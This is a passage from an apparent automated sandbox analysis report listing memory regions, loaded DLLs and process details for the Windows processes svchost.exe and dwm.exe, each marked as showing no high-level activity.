| private_0x000000dbbb700000 | 0xdbbb700000 | 0xdbbb7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbb900000 | 0xdbbb900000 | 0xdbbb9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbba00000 | 0xdbbba00000 | 0xdbbbafffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000dbbbb00000 | 0xdbbbb00000 | 0xdbbbc87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000dbbbc90000 | 0xdbbbc90000 | 0xdbbbe10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000dbbbe20000 | 0xdbbbe20000 | 0xdbbbf1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbbf20000 | 0xdbbbf20000 | 0xdbbc01ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbc020000 | 0xdbbc020000 | 0xdbbc09ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbc2a0000 | 0xdbbc2a0000 | 0xdbbc39ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000dbbc3a0000 | 0xdbbc3a0000 | 0xdbbc41ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff2a0000 | 0x7df5ff2a0000 | 0x7ff5ff29ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff787d68000 | 0x7ff787d68000 | 0x7ff787d69fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d6a000 | 0x7ff787d6a000 | 0x7ff787d6bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d70000 | 0x7ff787d70000 | 0x7ff787d71fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d72000 | 0x7ff787d72000 | 0x7ff787d73fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d74000 | 0x7ff787d74000 | 0x7ff787d75fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d76000 | 0x7ff787d76000 | 0x7ff787d77fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d78000 | 0x7ff787d78000 | 0x7ff787d79fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d7c000 | 0x7ff787d7c000 | 0x7ff787d7dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d80000 | 0x7ff787d80000 | 0x7ff787d81fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d84000 | 0x7ff787d84000 | 0x7ff787d85fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d86000 | 0x7ff787d86000 | 0x7ff787d87fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d88000 | 0x7ff787d88000 | 0x7ff787d89fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d8a000 | 0x7ff787d8a000 | 0x7ff787d8bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d8c000 | 0x7ff787d8c000 | 0x7ff787d8dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d8e000 | 0x7ff787d8e000 | 0x7ff787d8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787d90000 | 0x7ff787d90000 | 0x7ff787e8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787e90000 | 0x7ff787e90000 | 0x7ff787eb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff787eb4000 | 0x7ff787eb4000 | 0x7ff787eb5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787eb6000 | 0x7ff787eb6000 | 0x7ff787eb7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787eb8000 | 0x7ff787eb8000 | 0x7ff787eb9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787eba000 | 0x7ff787eba000 | 0x7ff787ebbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787ebc000 | 0x7ff787ebc000 | 0x7ff787ebcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787ebe000 | 0x7ff787ebe000 | 0x7ff787ebffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ffae8170000 | 0x7ffae8185fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ffae8200000 | 0x7ffae820bfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ffae84f0000 | 0x7ffae8504fff | Memory Mapped File | rwx |
|
|
|
- |
| sebbackgroundmanagerpolicy.dll | 0x7ffae8510000 | 0x7ffae851dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll | 0x7ffae8520000 | 0x7ffae8537fff | Memory Mapped File | rwx |
|
|
|
- |
| acpbackgroundmanagerpolicy.dll | 0x7ffae8540000 | 0x7ffae8556fff | Memory Mapped File | rwx |
|
|
|
- |
| cbtbackgroundmanagerpolicy.dll | 0x7ffae8560000 | 0x7ffae856bfff | Memory Mapped File | rwx |
|
|
|
- |
| backgroundmediapolicy.dll | 0x7ffae8570000 | 0x7ffae857ffff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffae8710000 | 0x7ffae8752fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffaef7b0000 | 0x7ffaef841fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffaf13a0000 | 0x7ffaf13affff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffaf1610000 | 0x7ffaf161bfff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| dab.dll | 0x7ffaf2c10000 | 0x7ffaf2c30fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffaf2c40000 | 0x7ffaf2c7efff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerserver.dll | 0x7ffaf2c80000 | 0x7ffaf2ce1fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| wmsgapi.dll | 0x7ffaf2e00000 | 0x7ffaf2e08fff | Memory Mapped File | rwx |
|
|
|
- |
| sysntfy.dll | 0x7ffaf2e10000 | 0x7ffaf2e1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lsm.dll | 0x7ffaf2e20000 | 0x7ffaf2ee0fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffaf2ef0000 | 0x7ffaf2fddfff | Memory Mapped File | rwx |
|
|
|
- |
| psmserviceexthost.dll | 0x7ffaf2fe0000 | 0x7ffaf3063fff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ffaf3070000 | 0x7ffaf3097fff | Memory Mapped File | rwx |
|
|
|
- |
| psmsrv.dll | 0x7ffaf30a0000 | 0x7ffaf30d1fff | Memory Mapped File | rwx |
|
|
|
- |
| bisrv.dll | 0x7ffaf30e0000 | 0x7ffaf3165fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ffaf3280000 | 0x7ffaf335afff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| tdh.dll | 0x7ffaf3390000 | 0x7ffaf3487fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ffaf3490000 | 0x7ffaf349bfff | Memory Mapped File | rwx |
|
|
|
- |
| umpoext.dll | 0x7ffaf34a0000 | 0x7ffaf34b5fff | Memory Mapped File | rwx |
|
|
|
- |
| umpo.dll | 0x7ffaf34c0000 | 0x7ffaf34dafff | Memory Mapped File | rwx |
|
|
|
- |
| umpnpmgr.dll | 0x7ffaf34e0000 | 0x7ffaf34fffff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ffaf4230000 | 0x7ffaf4249fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x7ffaf7250000 | 0x7ffaf72befff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #41: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k RPCSS |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x26c |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6C0
0x
6A8
0x
618
0x
14C
0x
330
0x
2A0
0x
298
0x
288
0x
280
0x
270
0x
7F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000092481b0000 | 0x92481b0000 | 0x92481bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0x92481c0000 | 0x92481c2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000092481d0000 | 0x92481d0000 | 0x92481e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000092481f0000 | 0x92481f0000 | 0x924826ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009248270000 | 0x9248270000 | 0x9248273fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009248280000 | 0x9248280000 | 0x9248280fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009248290000 | 0x9248290000 | 0x9248291fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x92482a0000 | 0x924835dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009248360000 | 0x9248360000 | 0x9248360fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009248370000 | 0x9248370000 | 0x9248370fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009248390000 | 0x9248390000 | 0x9248396fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248400000 | 0x9248400000 | 0x92484fffff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x9248500000 | 0x924857afff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000092485f0000 | 0x92485f0000 | 0x92485f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248600000 | 0x9248600000 | 0x924867ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248680000 | 0x9248680000 | 0x924877ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248800000 | 0x9248800000 | 0x92488fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x9248900000 | 0x9248c36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000009248c40000 | 0x9248c40000 | 0x9248d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248d40000 | 0x9248d40000 | 0x9248e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009248e40000 | 0x9248e40000 | 0x9248f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249040000 | 0x9249040000 | 0x924913ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249140000 | 0x9249140000 | 0x924923ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249440000 | 0x9249440000 | 0x924953ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249540000 | 0x9249540000 | 0x924963ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249640000 | 0x9249640000 | 0x924973ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009249800000 | 0x9249800000 | 0x92498fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffa20000 | 0x7df5ffa20000 | 0x7ff5ffa1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff78786e000 | 0x7ff78786e000 | 0x7ff78786ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787870000 | 0x7ff787870000 | 0x7ff787871fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787872000 | 0x7ff787872000 | 0x7ff787873fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787878000 | 0x7ff787878000 | 0x7ff787879fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78787a000 | 0x7ff78787a000 | 0x7ff78787bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78787e000 | 0x7ff78787e000 | 0x7ff78787ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787880000 | 0x7ff787880000 | 0x7ff78797ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787980000 | 0x7ff787980000 | 0x7ff7879a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7879a3000 | 0x7ff7879a3000 | 0x7ff7879a4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7879a7000 | 0x7ff7879a7000 | 0x7ff7879a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7879a9000 | 0x7ff7879a9000 | 0x7ff7879aafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7879ab000 | 0x7ff7879ab000 | 0x7ff7879abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7879ac000 | 0x7ff7879ac000 | 0x7ff7879adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7879ae000 | 0x7ff7879ae000 | 0x7ff7879affff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ffae8170000 | 0x7ffae8185fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffaf0920000 | 0x7ffaf0987fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffaf13a0000 | 0x7ffaf13affff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffaf3170000 | 0x7ffaf31a1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffaf31b0000 | 0x7ffaf3231fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7ffaf3240000 | 0x7ffaf3252fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcepmap.dll | 0x7ffaf3260000 | 0x7ffaf3276fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ffaf3280000 | 0x7ffaf335afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #42: dwm.exe
0
0
| Information | Value |
|---|---|
| ID | #42 |
| File Name | c:\windows\system32\dwm.exe |
| Command Line | "dwm.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2d8 |
| Parent PID | 0x1cc (c:\windows\system32\winlogon.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | Window Manager\DWM-1 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
4FC
0x
4F8
0x
4F4
0x
314
0x
308
0x
30C
0x
300
0x
2FC
0x
2E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000ca542c0000 | 0xca542c0000 | 0xca542cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca542d0000 | 0xca542d0000 | 0xca542d6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca542e0000 | 0xca542e0000 | 0xca542f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca54300000 | 0xca54300000 | 0xca5437ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca54380000 | 0xca54380000 | 0xca54383fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca54390000 | 0xca54390000 | 0xca54392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca543a0000 | 0xca543a0000 | 0xca543a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xca543b0000 | 0xca5446dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca54470000 | 0xca54470000 | 0xca54470fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca54480000 | 0xca54480000 | 0xca54480fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca54490000 | 0xca54490000 | 0xca54494fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca544f0000 | 0xca544f0000 | 0xca544f6fff | Private Memory | rw |
|
|
|
- |
| dwm.exe.mui | 0xca54500000 | 0xca54501fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ca54510000 | 0xca54510000 | 0xca54510fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca54520000 | 0xca54520000 | 0xca54520fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca54530000 | 0xca54530000 | 0xca54530fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca54540000 | 0xca54540000 | 0xca5454ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca54550000 | 0xca54550000 | 0xca54550fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca54560000 | 0xca54560000 | 0xca54560fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca54570000 | 0xca54570000 | 0xca5466ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca54670000 | 0xca54670000 | 0xca547f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca54800000 | 0xca54800000 | 0xca54829fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca54830000 | 0xca54830000 | 0xca5483ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca54840000 | 0xca54840000 | 0xca549c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca549d0000 | 0xca549d0000 | 0xca55dcffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca55e50000 | 0xca55e50000 | 0xca55e50fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca55e60000 | 0xca55e60000 | 0xca55e63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca55e70000 | 0xca55e70000 | 0xca55e7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xca55e80000 | 0xca561b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ca561c0000 | 0xca561c0000 | 0xca5623ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca56240000 | 0xca56240000 | 0xca562bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca562c0000 | 0xca562c0000 | 0xca56abffff | Private Memory | - |
|
|
|
- |
| pagefile_0x000000ca56ac0000 | 0xca56ac0000 | 0xca56b77fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca56b80000 | 0xca56b80000 | 0xca56b86fff | Private Memory | rw |
|
|
|
- |
| aero.msstyles | 0xca56b90000 | 0xca56cb1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ca56cc0000 | 0xca56cc0000 | 0xca56dbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca56dc0000 | 0xca56dc0000 | 0xca56e3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca56e40000 | 0xca56e40000 | 0xca56e40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca56e50000 | 0xca56e50000 | 0xca56e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca56e60000 | 0xca56e60000 | 0xca56e77fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca56e80000 | 0xca56e80000 | 0xca56eaffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca56eb0000 | 0xca56eb0000 | 0xca56faffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca56fb0000 | 0xca56fb0000 | 0xca56fb0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca56fc0000 | 0xca56fc0000 | 0xca56fc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ca56fd0000 | 0xca56fd0000 | 0xca5704ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca57050000 | 0xca57050000 | 0xca570cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca570d0000 | 0xca570d0000 | 0xca5714ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca57150000 | 0xca57150000 | 0xca57150fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca57160000 | 0xca57160000 | 0xca57160fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca57170000 | 0xca57170000 | 0xca57170fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca57180000 | 0xca57180000 | 0xca57180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca57190000 | 0xca57190000 | 0xca57190fff | Pagefile Backed Memory | r |
|
|
|
- |
| d2d1.dll.mui | 0xca571a0000 | 0xca571e1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ca571f0000 | 0xca571f0000 | 0xca576e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca576f0000 | 0xca576f0000 | 0xca57aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca57af0000 | 0xca57af0000 | 0xca57af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca57b00000 | 0xca57b00000 | 0xca57b00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca57b10000 | 0xca57b10000 | 0xca57b48fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca57b50000 | 0xca57b50000 | 0xca58041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca58050000 | 0xca58050000 | 0xca58050fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58060000 | 0xca58060000 | 0xca58060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58070000 | 0xca58070000 | 0xca58070fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58080000 | 0xca58080000 | 0xca58080fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca580a0000 | 0xca580a0000 | 0xca580a3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca580b0000 | 0xca580b0000 | 0xca580b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca580c0000 | 0xca580c0000 | 0xca580c0fff | Pagefile Backed Memory | r |
|
|
|
- |
